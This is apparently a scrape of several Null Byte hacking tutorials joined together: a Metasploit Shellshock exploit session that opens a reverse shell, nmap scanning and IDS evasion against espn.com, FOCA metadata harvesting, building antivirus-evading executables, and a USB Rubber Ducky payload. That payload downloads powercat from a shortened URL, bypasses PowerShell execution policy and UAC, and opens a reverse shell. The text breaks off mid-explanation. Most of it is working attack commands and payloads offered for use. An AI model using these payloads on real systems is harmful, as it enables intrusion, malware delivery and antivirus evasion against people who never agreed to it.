Stager linux/x86/shell/reverse_tcp_uuid normal Linux Command Shell, Reverse TCP Stager linux/x86/shell_bind_ipv6_tcp normal Linux Command Shell, Bind TCP Inline (IPv6) linux/x86/shell_bind_tcp normal Linux Command Shell, Bind TCP Inline linux/x86/shell_bind_tcp_random_port normal Linux Command Shell, Bind TCP Random Port Inline linux/x86/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline linux/x86/shell_reverse_tcp_ipv6 normal Linux Command Shell, Reverse TCP Inline (IPv6) msf exploit(multi/http/apache_mod_cgi_bash_env_exec) >A reverse TCP shell will suffice here, so typeset payload linux/x86/shell/reverse_tcpto enable it.msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > set payload linux/x86/shell/reverse_tcp payload => linux/x86/shell/reverse_tcpTypeoptionsagain and we can see the current settings for this module including payload information:msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > options Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec): Name Current Setting Required Description ---- --------------- -------- ----------- CMD_MAX_LENGTH 2048 yes CMD max line length CVE CVE-2014-6271 yes CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278) HEADER User-Agent yes HTTP header to use METHOD GET yes HTTP method to use Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 172.16.1.102 yes The target address RPATH /bin yes Target PATH for binaries used by the CmdStager RPORT 80 yes The target port (TCP) SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL/TLS for outgoing connections SSLCert no Path to a custom SSL certificate (default is randomly generated) TARGETURI /cgi-bin/hello.sh yes Path to CGI script TIMEOUT 5 yes HTTP read response timeout (seconds) URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host Payload options (linux/x86/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 172.16.1.100 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Linux x86 msf exploit(multi/http/apache_mod_cgi_bash_env_exec) >Step 3: Get ShellSome Metasploit modules have a handy little function that will check to see if the target is vulnerable. Typecheck, and if the module allows it, information about whether the target is vulnerable or not will be displayed.msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > check [*] 172.16.1.102:80 The target is vulnerable. msf exploit(multi/http/apache_mod_cgi_bash_env_exec) >We can see that the target is indeed vulnerable, so use theexploitcommand to launch the attack. A shell session is opened, and we can now run commands likeidandwhoamito view information about the current user:msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit [*] Started reverse TCP handler on 172.16.1.100:4444 [*] Command Stager progress - 100.46% done (1097/1092 bytes) [*] Sending stage (36 bytes) to 172.16.1.102 [*] Command shell session 2 opened (172.16.1.100:4444 -> 172.16.1.102:49499) at 2018-07-16 13:55:15 -0500 id uid=33(www-data) gis=33(www-data) groups=33(www-data) whoami www-dataHow to Protect Yourself from Shellshock VulnerabilitiesThe answer is simple: patch your system. If your system is not yet patched, you have no one to blame but yourself. This vulnerability has been out for years, and pretty much all systems have patches available, so make sure you use them.Don't Miss:Here's How to Patch macOS from the Shellshock Bash ExploitStay Tuned for Escalating PrivsSo far, we have learned about Shellshock and the CGI attack vector, used a Metasploit module to exploit this vulnerability, and gained a shell on our target system. But since this is a limited shell, we can only do so much. In the next article, we will use a kernel exploit to escalate privileges and get root.Next Up:Perform Local Privilege Escalation Using a Linux Kernel ExploitFollow Null Byte onTwitter,Flipboard, andYouTubeFollow WonderHowTo onFacebook,Twitter,Pinterest, andFlipboardWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover image byTumisu/Pixabay; Screenshots by drd_/Null ByteRelatedHack Like a Pro:How to Hack the Shellshock VulnerabilityHack Like a Pro:How to Exploit and Gain Remote Access to PCs Running Windows XPHow To:Create a Metasploit Exploit in Few MinutesHow to Hack Like a Pro:Getting Started with MetasploitHack Like a Pro:Metasploit for the Aspiring Hacker, Part 13 (Web Delivery for Windows)How To:Exploit Shellshock-Vulnerable Websites with Just a Web BrowserHack Like a Pro:Metasploit for the Aspiring Hacker, Part 4 (Armitage)Hack Like a Pro:Remotely Add a New User Account to a Windows Server 2003 BoxHow To:Audit Web Applications & Servers with TishnaHack Like a Pro:How to Exploit IE8 to Get Root Access When People Visit Your WebsiteHack Like a Pro:Metasploit for the Aspiring Hacker, Part 8 (Setting Up a Fake SMB Server to Capture Domain Passwords)Hack Like a Pro:Metasploit for the Aspiring Hacker, Part 12 (Web Delivery for Linux or Mac)SEToolkit:Metasploit's Best FriendHack Like a Pro:Hacking Windows XP Through Windows 8 Using Adobe Flash PlayerHow To:Perform Local Privilege Escalation Using a Linux Kernel ExploitHack Like a Pro:How to Embed a Backdoor Connection in an Innocent-Looking PDFHow To:Exploit EternalBlue on Windows Server with MetasploitHow To:Use Metasploit's Web Delivery Script & Command Injection to Pop a ShellHow To:Exploit Remote File Inclusion to Get a ShellHow to Hack Databases:Hunting for Microsoft's SQL ServerHack Like a Pro:Metasploit for the Aspiring Hacker, Part 9 (How to Install New Modules)Hack Like a Pro:Metasploit for the Aspiring Hacker, Part 7 (Autopwn)Hack Like a Pro:How to Take Control of Windows Server 2003 Remotely by Launching a Reverse ShellHow To:Hack Metasploitable 2 Including Privilege EscalationBASH SHELLSHOCK:Am I Still Vulnerable? - a Different Approach for Linux.Hack Like a Pro:How to Hack Your School's Server to Download Final Exam AnswersHack Like a Pro:Exploit MS Word to Embed a Listener on Your Roommate's ComputerHack Like a Pro:Hacking Samba on Ubuntu and Installing the MeterpreterIPsec Tools of the Trade:Don't Bring a Knife to a GunfightHow Null Byte Injections Work:A History of Our Namesake
Hack Like a Pro: How to Conduct Active Reconnaissance and DOS Attacks with Nmap Β« Null Byte :: WonderHowTo
Welcome back, my nascent Hackers!Inmy last blog, we looked at a passive way to gather information necessary for a hack. The advantage of using passive recon is that it's totally undetectable, meaning that the target never knows you're scouting them and you leave no tracks. The disadvantage, of course, is that it's limited to only some websites and not entirely reliable.In this tutorial, we'll look at active reconnaissance of a target with one of the best network scanning tools,nmap.The risk with active scanning is that you will be detected and the security hardware or security admin will block any further attempts by you to pwn the site, or worseβ€”report you to law enforcement. Nmap has multiple modes of scanning a potential target and many ways of evading detection.Step 1: Open NmapLet's go to our hacking platform,BackTrack, and open up nmap. To find it, go the BackTrack button at the bottom left of the screen to open up the initial menu options. Then, selectBackTrack->Information Gathering->Network Analysis->Network Scanners, and click onnmap.Step 2: Using NmapWhen you select nmap, you'll open a screen that looks like the screenshot below.Note that it opens a Linux terminal with the help screen for nmap. Whenever you want to see the help screen, you can simply type at the command prompt:bt > nmap -hYou can also get the manual for nmap by typing:bt > man nmapNmap is a delightful tool for gathering information on a network or site. For instance, if we want to gather information onESPN.com, we can type:bt > nmap -sT espn.comWe can see some of the output below.This command tells nmap to scan (-s) using TCP (T) the domain espn.com. Note that the output shows us the ports that this web server has open. With this information, we can then reasonably conclude that the default services for these ports are running on this system. In this case, this server has port 25 open (SMTP), port 80 open (HTTP), port 135 open (msrpc), port 139 open (net-bios), and port 445 (msds).This is important information to have when selecting a hack/exploit as each hack is specific to technologies/services.Step 3: Operating System DetectionNmap is also capable of detecting and making a guess as to what the operating system is. Type:bt > nmap -O espn.comWe can see from the screenshot above that nmap guessed that this site is running F5 Networks with a 93% probability and OpenBSD with a lower 85% probability.Step 4: Stealth ScanThe above scan by nmap is highly reliable, but its drawback is that it's also easily detectable. Nearly every system admin will know that you're scanning their network as it creates a full TCP connection, and this is logged with your IP address in the log files.A more stealthy scan can be conducted using the -sS switch in nmap. This scan uses SYN flagged packets that do NOT create a connection on the target machine and therefore are not logged. This type of scan is slightly less reliable, but is much more stealthy. Type:bt > nmap -sS espn.comAs we can see in the screenshot above, it gave us the same results without our activity being logged by the target system.Step 5: Evading Intrusion Detection SystemsMost commercial servers and websites have intrusion detection systems (IDS) protecting them. These systems look for telltale signs of malicious activity, then alert the security administrator. Scans such as ours are easily detected by these systems and can set off an alert.However, there are numerous ways to evade these IDSs, and we'll look at one here.IDSs usually have a threshold setting. This means that if it sees numerous packets that appear to be scans, then it will alert the admin. To avoid detection, we can simply slow down our scan below this threshold. Nmap has numerous speed settings. Here we'll use the "sneaky" speed setting. Let's type:bt > nmap -sS -T2 espn.comThe -T2 setting tells nmap to use the sneaky speed. This scan will likely take longer, but it is much more likely to go undetected by the IDS.One Final NoteNmap can also be an excellentdenial of service (DOS)tool. If several individuals all send packets from nmap at a target simultaneously at high speed (nmap "insane" speed or -T5), they're likely to overwhelm the target and it will be unable to process new website requests effectively, rendering it useless.We'll continue with more reconnaissance techniques in future tutorials, so keep coming back! Until then, feel free to ask questions on this topic below, or head theNull Byte forumfor any questions off topic.Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover image courtesy of 20th Century FoxRelatedNews:How to Study for the White Hat Hacker Associate Certification (CWA)Hack Like a Pro:Using the Nmap Scripting Engine (NSE) for ReconnaissanceHack Like a Pro:How to Perform Stealthy Reconnaissance on a Protected NetworkHow To:Tactical Nmap for Beginner Network ReconnaissanceHack Like a Pro:How to Conduct OS Fingerprinting with Xprobe2How to Hack Databases:Hunting for Microsoft's SQL ServerHow To:Use NMAP 7 to Discover Vulnerabilities, Launch DoS Attacks and More!Hack Like a Pro:The Hacker MethodologyHack Like a Pro:How to Hack Web Apps, Part 2 (Website Spidering with WebScarab)Advanced Nmap:Top 5 Intrusive Nmap Scripts Hackers & Pentesters Should KnowHack Like a Pro:Advanced Nmap for ReconnaissanceHow To:The Five Phases of HackingHow To:Attack a Vulnerable Practice Computer: A Guide from Scan to ShellHack Like a Pro:How to Use Maltego to Do Network ReconnaissanceHack Like a Pro:How to Conduct Passive Reconnaissance of a Potential TargetHow To:Automate Brute-Force Attacks for Nmap ScansHack Like a Pro:How to Scan the Internet for Heartbleed VulnerabilitiesHack Like a Pro:How to Conduct Active Reconnaissance on Your Target with hping3Mac for Hackers:How to Organize Your Tools by Pentest StagesHow To:Advanced Penetration Testing - Part 1 (Introduction)How To:Perform Network-Based Attacks with an SBC ImplantHack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 10 (Identifying Signatures of a Port Scan & DoS Attack)News:Banks Around the World Hit with Repeated DDoS Attacks!Hack Like a Pro:Creating a Virtually Undetectable Covert Channel with RECUBHack Like a Pro:How to Exploit and Gain Remote Access to PCs Running Windows XPHow To:Easily Detect CVEs with Nmap ScriptsVideo:How to Use Maltego to Research & Mine Data Like an AnalystBecome an Elite Hacker, Part 2:Spoofing Cookies to Hack Facebook SessionsHack Like a Pro:How to Conduct Passive OS Fingerprinting with p0fHacking Reconnaissance:Finding Vulnerabilities in Your Target Using NmapHow To:How Hackers Use Your IP Address to Hack Your Computer & How to Stop ItWeekend Homework:How to Become a Null Byte ContributorNews:Obama and Congress Approve Resolution that Supports UN Internet TakeoverHow To:Spider Web Pages with Nmap for SQLi VulnerabilitiesWeekend Homework:How to Become a Null Byte Contributor (1/29/2012)Weekend Homework:How to Become a Null Byte Contributor (1/12/2012)Vaccine bombshell:Baby monkeys develop autism after routine CDC vaccinations
Hack Like a Pro: How to Extract Metadata from Websites Using FOCA for Windows Β« Null Byte :: WonderHowTo
Welcome back, my greenhorn hackers!My preference forLinuxas a hacking platform iswell documented, and I have even created aseries of tutorialsto train new hackers. Without being proficient in Linux, you can't really call yourself a hacker.Every once in while, though, a hacking tool comes out for Windows that makes me stand up and take notice. For instance, Cain and Abel is an excellent tool forpassword crackingandMitM attacksand is only available on the Windows platform. I could name a few others, but only Havij, the excellent SQL injection tool, comes immediately to mind.FOCA was released in 2009 and is now in version three. Although a Linux version is included inKali, it is outdated. Let's download the latest Windows version and use it here to perform somereconnaissance.Good Reconnaissance Is CriticalFOCA is an excellent website reconnaissance tool with lots of interesting features and capabilities. Remember, before attacking any website or domain, it is critical to gather as much information as possible. From this information, you can determine the attack that is most likely to work against that site or network.In this tutorial, we will looking at FOCA's ability to find, download, and retrieve files from websites with the file's metadata.This metadata can give us insight into such information as the users (could be critical in cracking passwords), operating system (exploits are OS-specific), email addresses (possibly forsocial engineering), the software used (once again, exploits are OS-, and more and more often, application-specific), and if we are really lucky, passwords.Step 1: Downlaod FOCA for WindowsFirst, let's downloadFOCA Free 3.0 for Windows.Step 2: Choose Where You Save ResultsWhen you install FOCA, you will greeted with a screen like that below. The first task we need to do is to start a new project and then tell FOCA where we want to save our results.Click on image to enlarge.I created a new directory atc:\focaand will save all my results there. Of course, you can save your results wherever is convenient for you, or use the default temp directory.Step 3: Create a ProjectIn this tutorial, I will be starting with a project named after the information security training company, SANS, which is located atsans.org, and I will be saving my results toc:\foca.Click on image to enlarge.Step 4: Getting the MetadataOnce I create my project, I can go to the object explorer to the far left and selectMetadata. This enables us to pull the metadata from the files on the website that contain metadata. Files such as .pdf, .doc, .xls, etc. all contain metadata that could be useful in your hack of your target.When you select metadata, you will pull up a screen like that below. In our case here, we will be searching sans.org for .doc files, so the syntax to be placed in the search window is:site:sans.org filetype:docThis will search the entire sans.org website, looking for .doc files. When I hit theSearchbutton next to the window, it will begin to search and find all the .doc files at sans.org.Click on image to enlarge.Of course, if you were searching for .pdf files or other filetypes, you would put in that filetype. You can also search for multiple filetypes by listing them after filetype, such as:site:sans.org filetype:pdf,doc,xlsStep 5: Download the FilesOnce FOCA is done retrieving a list of all the .doc files, we can then right-click on any file and download the file to our hard drive, download all the files, or analyze the metadata. I chose to download all the .doc files I found at sans.org.Click on image to enlarge.Step 6: Collect & Analyze the MetadataNow that we have downloaded all the .doc files, I chose to analyze all the metadata in them. Microsoft's Office files collect significant amounts of data as they are being created and edited that we can then extract.When we expand the Metadata folder in the object explorer, you can see that we have 156 .doc files and 2 .docx files.Click on image to enlarge.The Types of Metadata CollectedJust beneath the Metadata documents folder is another folder titled,Metadata Summary. We can click on it and it reveals the type of metadata is has collected from the files. This metadata is broken into eight (8) categories:UsersFoldersPrintersSoftwareEmailsOperating SystemsPasswordsServersLet's take a look atUsersfirst. When we click on users, we can see that FOCA has collected the names of every user that worked on those files.Click on image to enlarge.When we click onSoftware, we can see the various editions of Microsoft Office that has been used, including five (5) users that created their documents with Office '97 (hmm...wonder if there are any Office '97 vulnerabilities still out there?).Click on image to enlarge.We can also look for email addresses that are embedded in the documents as displayed below. Obviously, these folks are making themselves available to asocial engineering attack.Click on image to enlarge.We can also gather printer, folder, passwords, and servers from this metadata depending upon the documents we recover. All of this information can then be used to determine what is the best attack against this organization/website.In future tutorials, we will continue to explore the capabilities of FOCA, so keep coming back, my greenhorn hackers!Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover image viaShutterstockRelatedHow To:Obtain Valuable Data from Images Using Exif ExtractorsHack Like a Pro:How Windows Can Be a Hacking Platform, Pt. 1 (Exploit Pack)Hacking macOS:How to Hide Payloads Inside Photo MetadataHow To:Completely Remove Your Hidden Personal Information from Digital PhotosHow To:Hack Lets You Fully Activate a Bootleg Copy of Windows 8 Pro for FreeHow To:Capture Unauthorized Users Trying to Bypass Your Windows 8 Lock ScreenHow To:Detect Misconfigurations in 'Anonymous' Dark Web Sites with OnionScanHow To:Change File Metadata (Access/Modification Date)Hack Like a Pro:How to Hack Facebook (Facebook Password Extractor)Hack Like a Pro:The Hacker MethodologyHow To:Create metadata subscriptions in Final Cut ServerHow To:How Anyone (Even Pirates) Can Get Windows 10 for Freeβ€”LegallyNews:What to Expect from Null Byte in 2015How To:Get Windows Media Center for Free on Windows 8 ProHack Like a Pro:How to Find Website Vulnerabilities Using WiktoHow To:Download High-Res Album Artwork & Detailed ID3 Tags for Your Android's MP3 LibraryHow To:Scrub the EXIF Data from Photos on Your Android Phone Before Sharing ThemHow To:Remap the Soli Motion Sense Gestures on Your Pixel 4 β€” No Root NeededHow To:Change This Privacy Setting Before You Share Any Pictures on Google PhotosHack Like a Pro:How to Exploit IE8 to Get Root Access When People Visit Your WebsiteHack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 12 (Windows Prefetch Files)How To:Edit metadata in ApertureHow To:Stop Your iPhone Photos from Broadcasting Your Location to OthersHack Like a Pro:Reconnaissance with Recon-Ng, Part 1 (Getting Started)News:Finding Hidden Metadata in Images (Oh, the Possibilities)How To:How Hackers Take Your Encrypted Passwords & Crack ThemHack Like a Pro:Hacking Samba on Ubuntu and Installing the MeterpreterHow To:Build Your Own "Pogo Mo Thoin" to Flash Any Xbox 360 DVD Drive for Under $5How To:Make Your Videos Sound AWESOMEHow To:Hack Wireless Router Passwords & Networks Using HydraHow To:Stream Media to a PS3 or Xbox 360 from Mac & Linux ComputersHow To:The Official Google+ Insider's Guide IndexHow To:Hack Together an Accelerometer-Aware Mobile Website by Accessing Motion Sensors in JavaScriptHow to Hack Your Game Saves:A Basic Guide to Hex EditingHow To:Use Wireshark to Steal Your Own Local PasswordsHow To:Find metadata in Word docs and jpegs supporting Exif
Creating a (Almost) Fully Undetectable EXE Using Kali & GCC Β« Null Byte :: WonderHowTo
First, I want to give credit to the author where I first found how to do this:Astr0baby's Blog. This article was dated, so I took the script on his page and reworked it to make it work today. (I also included the way to make it hide the cmd line popup.)RequirementsKali (or another Linux distro)Metasploit (Framework, Express, or Pro)GCC (I use the Windows version on MinGW on Wine)A basic understanding of how to set up Metasploit's multi/handlerNote: If you do not have the Windows version of MinGW installed,this Postcan show you how I do it.OverviewIt's no secret that AV sandboxes our executables, verifies their signatures, and uses other methods to determine whether our "legit" file is malicious or not. (Norton goes a step further and makes sure it doesn't connect to an unknown source without permission.) So how do we get around this?In this how-to, I'm going to show you my method for AV evasion that uses the msfpayload and msfencode commands to create an executable file. Then we will run the code through some custom commands and "filler" variables to make it less detectable to AV.Be aware: Metasploit is doing away with msfpayload and msfencode in the coming months, somsfvenomis going to be used instead. If you can modify this process to incorporate msfvenom, please get with me about it. I would love to keep this updated.PreparationThere are three things you need to do before you run the commands following.Update Kali:sudo apt-get updateCreate a "ShellCode" folder in the metasploit root folder:mkdir /usr/share/metasploit-framework/ShellCodeCreate an "out" folder in the root folder:mkdir /root/outI made the executable in the/root/outfolder to keep things neat when creating multiple files. This is optional, but will require some editing of the commands if you choose not to place the finished .exe files there.The CommandsBelow is the code for creating the executable. This was originally just something for me to play with, so it may look a bit messy. Change the IP, port, enumber (encoder iterations), and seed variables as much or as little as you need to fit your scenario.Download on GitHubBe sure that the ShellCode folder is empty prior to running this.Starting the ListenerJust in case you're reading this and have never started a Metasploit multi/handler module, here's how you do it:msfconsoleuse exploit/multi/handlerset LHOST xx.xxx.xxx.xxset LPORT 4444#OPTIONALset ExitOnSession falseexploit -jBe sure your LHOST is the local IP address, even if you are making the executable connect to an external IP.Final ThoughtsAs stated before, this is a rework of an external article. I have made it into something more usable to me and also added the hidden command window strings that Astr0baby left out on his blog.I have found this to be effective on multiple Windows OS's using most antivirus softwares and it bypasses it 9/10 times. Be aware that Norton Antivirus will recognize the file ONLY after it's executed and block a "meterpreter/reverse_tcp" attack. One way I've (kind of) gotten around this is to usemeterpreter/reverse_httpsin the executable and listener. It still asks the user if they want to allow the connection, but doesn't call it malicious.So, give it a shot. If you like it, I'm glad I could help. If you have ways to improve it, PM me. I would love to improve on this!UPDATE: Now in Proper BASH Format.Ok. so with some of you having problems getting this to work, I decided to make this a script rather Copy/Paste.The new repo is here:Download on GitHubI hope this helps!Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedHow To:Bypass Antivirus Using Powershell and Metasploit (Kali Tutorial)How To:Create an Undetectable Trojan Using a Domain NameHow To:Hide a Virus Inside of a Fake PictureHack Like a Pro:How to Evade AV Software with ShellterHow To:Hack Any Windows 7/8/10 User Password Without Logging InHack Like a Pro:Metasploit for the Aspiring Hacker, Part 5 (Msfvenom)Hacking Windows 10:How to Create an Undetectable Payload, Part 2 (Concealing the Payload)Hack Like a Pro:Creating a Virtually Undetectable Covert Channel with RECUBHow To:Run an VNC Server on Win7How To:Hack Windows Administrator Password with Out SAMHow To:Use MinGW to Compile Windows Exploits on Kali LinuxHow To:Build and Install Kali Nethunter (The New Version) On a Supported Android Device Running Android 6.0.1News:A WORD TO THE WISE ABOUT REMOVING INTERNET EXPLORERHow To:Use Cygwin to Run Linux Apps on WindowsDrive-By Hacking:How to Root a Windows Box by Walking Past It
Android for Hackers: How to Backdoor Windows 10 Using an Android Phone & USB Rubber Ducky Β« Null Byte :: WonderHowTo
With an inconspicuous Android phone andUSB flash drive, an attacker can compromise aWindows 10computer in less than 15 seconds. Once a root shell has been established, long-term persistence to the backdoor can be configured with just two simple commands β€” all while bypassing antivirus software and Windows Defender.How This Attack WorksPowercatis a fully-featuredPowerShellmodule. It operates a lot likeNetcatand allows PowerShell users to create TCP and UDP tunnels with simple command-line arguments. A PowerShell payload will be created to download, import, and execute Powercat in a single command. Then, it will be encoded into a binary format theUSB Rubber Duckycan understand.Using the USB Rubber Ducky, Powercat is executed in Windows 10 as an administrator which quickly establishes a root shell via the attacker's Netcat listener. At that point, persistence is configured using theschtaskscommand, which was designed by Microsoft to automate tasks and commands in Windows 10.Previously:Exfiltrate WPA2 Wi-Fi Passwords Using Android & PowerShellPrerequisitesThere's a bit of hardware required to perform this hack that some of you may already have laying around. Below are the four key items.1. USB Rubber DuckyTheUSB Rubber Duckyidentifies itself as a keyboard when inserted into computers, then proceeds to automatically type malicious commands pre-programmed into its payload. The payload can be customized to perform a myriad of advanced exploits. Prices for the USB Rubber Ducky from Hak5 start at $45.Buy a USB Rubber Ducky fromAmazon|Hak5What the USB Rubber Ducky looks like without its shell.Image by tokyoneon/Null ByteAs an alternative to the USB Rubber Ducky, theNetHunterandDroidDuckyprojects can weaponize Android devices into keystroke injection tools. They requiremodifying the Android operating systemwhich is beyond the scope of this article, unfortunately. Both NetHunter and DroidDucky are fantastic projects for those willing to alter their phone's operating system. Imagine connecting an Android phone to any computer and having it execute complex PowerShell payloads in seconds β€” no USB Rubber Ducky required.2. Android Device with UserLAnd InstalledAny Android phone or tablet capable of running theUserLAnd appwill be suitable. The device doesn't need to be rooted. All that is required is access to the internet via Wi-Fi and the aforementioned UserLAnd application.Shop for Unlocked Android Phones on Amazon3. OTG Adapter (Conditional)After creating the PowerShell payload (in a later step), it will need to be moved to themicroSD cardin the UBS Rubber Ducky. Some Android phone and tablet models come equipped with a microSD expansion slot for more storage, so if you have one of those, you're good to go since you can transfer the file that way.If your device doesn't have a microSD slot, then you'll need an On-The-Go (OTG) adapter of some sort, which allows you to connect memory cards to your device via the charging port. An all-in-one solution would be theMonoprice USB-C microSD Reader, if your phone has a USB Type-C port. Lexar makesa similar product for Micro-USB ports.On Amazon:Monoprice USB-C microSD ReaderOn Amazon:Lexar microSD Reader with Micro-USB ConnectorSince the USB Rubber Ducky comes with a microSD-to-USB adapter, you could opt for an OTG adapter that has a female USB Type-A end to plug the microSD adapter into. If you have a USB-C port on your Android device,Aukey makes a good adapter. For Micro-USB ports, there are many cheap options available, such asUgreen's cable.On Amazon:Aukey USB-C to USB 3.0 AdapterOn Amazon:Ugreen Micro-USB to USB 2.0 AdapterImage by tokyoneon/Null ByteAlternatively, any combination of adapters can get the job done. As you can see below, I'm using an Aukey adapter coupled with anAnker Portable Card Reader.Image by tokyoneon/Null Byte4. Virtual Private Server (Optional)Whether or not avirtual private server(VPS) is required will depend on the attack scenario. If a Wi-Fi network is shared with the target device, then embedding the attacker's local IP address into the payload will work just fine. In other scenarios, it may be required to deploy aVPSorNgrok server.Don't Miss:The White Hat's Guide to Choosing a Virtual Private ServerStep 1: Getting Started with UserLAndBefore going forward, you should check out Distortion's guide onturning an Android phone into a hacking device without root, as well as my guide onhacking WPA2 Wi-Fi passwords using Android, as they cover the UserLAnd basics and setting up Kali Linux, Ngrok, and installing essential software that will be required to follow along with this article.You'll need to install and configure UserLAnd,create a new file system, and connect to the OSvia SSH with ConnectBot(or JuiceSSH or the built-in SSH client).Step 2: Update the System & Install Essential SoftwareLike any Unix-based device, it's a good idea to make sure the installed packages are fully up to date before proceeding with projects. Be sure toupdate the systemandinstall essential software, as well as install Java which is needed for the USB Rubber Ducky payload, using the below commands.~$ sudo apt-get update && sudo apt-get dist-upgradeThis command can take several minutes to complete depending on the available internet speed and Android CPU. Older Android devices will take longer to download and decompress packages.To install essential software, use the below command.~$ sudo apt-get update && sudo apt-get install net-tools netcat gnupg curl wget git nano screenJava is required to compile Ducky payloads. To install it, use the below command.~$ sudo apt-get install default-jre-headlessFinally, reboot the Android device to ensure all of the package and kernel updates take effect next time the Android boots into the UserLAnd Kali OS.Step 3: Start the Netcat ListenerBased on the attack scenario, there are several ways to set up the Netcat listener that will allow for remote access to the target Windows computer.Local IP Address. If the target computer is on the same Wi-Fi network as the Android device, it will be possible to simply start the Netcat listener in the UserLAnd Kali OS. While private and quick, this method isn't ideal. If and when the target disconnects from the shared Wi-Fi network, the Netcat connection will break and there will be no way of accessing the device as it moves between different networks.Virtual Private Server. VPS's are ideal for remotely hacking targets as they move between different Wi-Fi network anywhere in the world. In this scenario, the attacker would purchase a cheap VPS and SSH in. Netcat and Screen would be installed for long-term persistence into the hacked Windows computer. This can be set up entirely with Android.Ngrok. Setting up remote access using Ngrok has been covered to some degree in "Hack WPA2 Wi-Fi Passwords Using Android." In this case, Ngrok would forward requests back to the attacker's Android device. Free Ngrok accounts don't allow users to recycle subdomains so this would only allow for persistence until the Ngrok server is terminated on the Android device. While it's possible to keep a server up and running in Android for a prolonged period of time, it's inevitable for it to eventually terminate when the Android reboots or silently close the UserLAnd app running in the background.In any case, it's a good idea to set up Screen so that terminal sessions persist despite SSH connections closing.Screenallows users to manage multiple terminal sessions within the same console. Readers are encouraged tolearn how to use Screenas it makes it easy to navigate and "detach" multiple terminal sessions without losing data.To start a new Screen session, simply type screen.~$ screenThen, use theifconfig-acommand to identify the local IP address used by the system. This IP will be required in the next step when creating the payload.~$ ifconfig -a wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.0.208 netmask 255.255.255.0 broadcast 192.168.0.255 inet6 ::::: prefixlen 64 scopeid 0x20<link> unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC) RX packets 95745 bytes 115985231 (110.6 MiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 44735 bytes 4289090 (4.0 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0In the UserLAnd Kali OS, there will be many available interfaces. The "wlan0" or "wlan1" interface will most likely hold the devices local IP address (192.168.0.208). VPS users will instead embed the same external IP address used when SSHing into the server. Ngrok users will have to set up a server and embed the URL into the payload.Finally, start the Netcat listener using the below command.~$ netcat -vv -l -p 1234Using port (-p) 1234, Netcat will listen (-l) on every available interface. The-vv(verbose) will print the target's IP address in the terminal when a new connection is established.Step 4: Create the PayloadAfter the Android reboots, fire up the UserLAnd app and SSH into the new Kali system. Usenanoto create a new "payload.txt" file in the home (~/) directory. This file will contain the Ducky payload in plain text.~$ nano ~/payload.txtComments (REM) have been added to explain what each line of the payload does.REM This first delay stalls the Ducky for 5.5 seconds to give the target REM operating system some time to mount the USB as a keyboard device. DELAY 5500 REM Opens the Windows Run prompt. GUI r REM Delays .7 seconds to give the Run prompt time to open. DELAY 700 REM Types the PowerShell payload. STRING powershell /w 1 /C $a=$env:TEMP;Set-ExecutionPolicy Bypass;wget https://cutt.ly/cW13i -o $a\d.ps1;ipmo $a\d.ps1;powercat -c 192.168.0.208 -p 1234 -e powershell REM Presses Ctrl + Shirt + Enter to execute the PowerShell with administrative privileges. CTRL-SHIFT ENTER REM Delay .85 seconds to give the UAC prompt time to open. DELAY 850 REM Presses Alt + Y to bypass UAC. ALT yThere's a lot going on in the PowerShell one-liner. There are multiple commands tied together and separated by semicolons.$a=$env:TEMPβ€” The target's temp directory gets set to the variable $a. This variable is called twice later in the script. First, acting as the output directory for the powercat.ps1 and again called when importing it. Using the single letter $a variable helps shorten the overall length of the payload; It's more effective than using "C:\Users\%USERNAME%\AppData\Local\Temp" several times in the payload.Set-ExecutionPolicy Bypassβ€”Set-ExecutionPolicyis asecurity feature of PowerShellthat prevents many similar PowerShell payloads from being executed. In several tests, I found simply setting the-ExecutionPolicywasn't enough to bypass this security feature. As an administrator (root), this policy can be bypassed.wget https://cutt.ly/cW13i -o 